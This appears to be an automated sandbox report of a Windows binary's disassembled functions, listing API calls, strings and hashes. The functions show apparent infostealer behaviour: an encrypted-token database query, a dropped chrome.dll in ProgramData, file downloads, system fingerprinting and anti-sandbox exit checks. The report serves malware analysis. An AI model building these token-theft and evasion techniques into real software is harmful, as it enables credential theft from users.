Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
HeapAlloc.KERNEL32(00000000), ref: 0041779A
wsprintfA.USER32 ref: 004177D0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

C, xrefs: 004176DC
:, xrefs: 004176EC
\, xrefs: 004176F0

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D45830,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D45830,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
__aulldiv.LIBCMT ref: 00418302
__aulldiv.LIBCMT ref: 00418310
wsprintfA.USER32 ref: 0041833C

Strings

@, xrefs: 004182DD
%d MB, xrefs: 00418333

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,02D471B0), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(00412DB1), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: 8c1e690a91e3a8b057371a17a7f8741b1016d8dd01958e3654c52482fa541184
Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
Opcode Fuzzy Hash: 8c1e690a91e3a8b057371a17a7f8741b1016d8dd01958e3654c52482fa541184
Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59

Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
memset.MSVCRT ref: 004173EA
??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 422bab9be7a167654f5719224d86fcf0bcb14d3f993f5ca0dc8bf43c10f8d7c1
Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
Opcode Fuzzy Hash: 422bab9be7a167654f5719224d86fcf0bcb14d3f993f5ca0dc8bf43c10f8d7c1
Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59

Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040BC6F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
lstrlenA.KERNEL32(00000000), ref: 0040BD75
lstrlenA.KERNEL32(00000000), ref: 0040BD89

Strings

AccountTokens, xrefs: 0040BB19
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBBB
AccountId, xrefs: 0040BC94
AccountTokens, xrefs: 0040BA8A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 748b0c5062154998d25a4c4f11c1282f3fc4d2b4c489a6a1124dcc1f97ea5388
Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
Opcode Fuzzy Hash: 748b0c5062154998d25a4c4f11c1282f3fc4d2b4c489a6a1124dcc1f97ea5388
Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A

Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871

Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098

StrCmpCA.SHLWAPI(00000000,02D3E338), ref: 00410922
StrCmpCA.SHLWAPI(00000000,02D3E2E8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,02D3E1C8), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Strings

C:\ProgramData\chrome.dll, xrefs: 004108CD
C:\ProgramData\chrome.dll, xrefs: 00410C30

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: ebda2443884703dd5d103cbfc899c0eb7825ded622948afb9f2454e71ce9ee78
Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
Opcode Fuzzy Hash: ebda2443884703dd5d103cbfc899c0eb7825ded622948afb9f2454e71ce9ee78
Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A

Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,02D45350,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00414A51
lstrcatA.KERNEL32(?,?), ref: 00414A70
lstrcatA.KERNEL32(?,?), ref: 00414A84
lstrcatA.KERNEL32(?,02D40680), ref: 00414A97
lstrcatA.KERNEL32(?,?), ref: 00414AAB
lstrcatA.KERNEL32(?,02D45D90), ref: 00414ABF

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 823271b5fb52d6285b2f4b64035771459d6b2a4a314f3240a76e9e5f6213c198
Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
Opcode Fuzzy Hash: 823271b5fb52d6285b2f4b64035771459d6b2a4a314f3240a76e9e5f6213c198
Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC11C0), ref: 00419BF1
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC11D8), ref: 00419C0A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC11F0), ref: 00419C22
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC1388), ref: 00419C3A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC13B8), ref: 00419C53
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D3E0E8), ref: 00419C6B
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D3B198), ref: 00419C83
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D3B2F8), ref: 00419C9C
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC1358), ref: 00419CB4
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC13A0), ref: 00419CCC
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC13D0), ref: 00419CE5
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC13E8), ref: 00419CFD
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02D3B1B8), ref: 00419D15
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(77190000,02CC1400), ref: 00419D2E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14

GetUserDefaultLCID.KERNEL32 ref: 00416CC6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D3E158,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02D3E158,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: e2d5f6c117dc490761017ebc5990b915e4a71bb72e798f42a295d4fb6ec95c4f
Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
Opcode Fuzzy Hash: e2d5f6c117dc490761017ebc5990b915e4a71bb72e798f42a295d4fb6ec95c4f
Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

RegQueryValueExA.KERNEL32(00000000,02D45818,00000000,000F003F,?,00000400), ref: 0041867C
lstrlenA.KERNEL32(?), ref: 00418691
RegQueryValueExA.KERNEL32(00000000,02D45728,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
RegCloseKey.KERNEL32(00000000), ref: 00418798
RegCloseKey.ADVAPI32(00000000), ref: 004187AA

Strings

%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
